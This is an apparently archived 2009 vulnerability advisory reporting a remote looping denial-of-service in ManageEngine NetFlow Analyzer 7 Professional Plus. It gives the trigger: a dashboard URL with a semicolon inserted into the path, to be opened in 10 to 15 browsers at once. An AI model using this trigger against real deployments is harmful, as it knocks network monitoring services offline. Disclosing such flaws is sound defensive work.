The NetFlow Analyzer 7 Professional Plus remote looping DoS

2009.12.14

Credit: Asheesh Anaconda

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

*************************************************************************************************************************
Automated Looping Problem on NetFlow Analyzer 7 professional Plus
**************************************************************************************************************************
# code by Asheesh kumar Mani Tripathi
# Credit by Asheesh Anaconda
# Company AKSIT Services
# Vulnerable Software:ManageEngine NetFlow Analyzer 7 professional Plus
# Date:19-Nov-2009
# Tested on Window os
# Browser Mozilla/IE8
#About Software-ManageEngine NetFlow Analyzer is a traffic analysis and network forensic tool that leveroges
on the wide range of management technologies that are part of Cisco IOS, As the only product that supports
Cisco NetFlow, Cisco NBAR , CiscoCBQoS
Exploit: Open different browser 10to 15 and just copy and paste link on your browser
http://localhost:8080/;netflow/jspui/dashBoard.do?dId=1
Reason:Semicolon ";" Input validation in Propely Done

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

The NetFlow Analyzer 7 Professional Plus remote looping DoS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.